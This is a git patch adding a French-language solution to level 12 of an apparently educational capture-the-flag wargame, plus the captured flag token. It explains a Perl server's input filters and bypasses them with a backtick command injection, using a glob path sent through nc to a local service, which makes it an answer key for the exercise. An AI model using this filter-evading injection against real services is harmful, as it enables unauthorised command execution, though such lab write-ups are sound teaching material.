From 7bef284443a350536916264d1192fc07a681ed3c Mon Sep 17 00:00:00 2001
From: Lapin <serprev.z@gmail.com>
Date: Thu, 28 Jan 2021 19:37:42 +0100
Subject: [PATCH] level12

---
 level12/Ressource/solution | 25 +++++++++++++++++++++++++
 level12/flag               |  1 +
 2 files changed, 26 insertions(+)
 create mode 100644 level12/Ressource/solution
 create mode 100644 level12/flag

diff --git a/level12/Ressource/solution b/level12/Ressource/solution
new file mode 100644
index 0000000..14a36bc
--- /dev/null
+++ b/level12/Ressource/solution
@@ -0,0 +1,25 @@
+# Il y a un script perl qui semble estre en mode serveur
+# On peut lui envoyer 2 paramertre. Mais seul le premier semble etre unteressant
+# le premeir parametre passe par 2 filtre.
+# Le les caracter alphabetique en majuscule
+# Le deuxieme suprime tout ce qu'il y a apres le premier espace
+# En suite ce parametre et executer au sein d'une commande shell executier depuis du perl
+
+# On ne poura donc pas executer de comande en tant que tel.
+# mais on peut executer un fichier
+
+# Dans un fichier /tmp/.TOTO ont va mettre le comptenue suivant:
+
+	#!/bin/sh
+	getflag > /tmp/.flag12 
+
+# puis on envoie un requet avec des back-quote pour executer le fichier
+
+$ nc -v localhost 4646
+> GET /?x=`/*/.TOTO`
+
+$ cat /tmp/.flag12
+> Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
+
+
+
diff --git a/level12/flag b/level12/flag
new file mode 100644
index 0000000..29e9492
--- /dev/null
+++ b/level12/flag
@@ -0,0 +1 @@
+g1qKMiRpXf53AWhDaU7FEkczr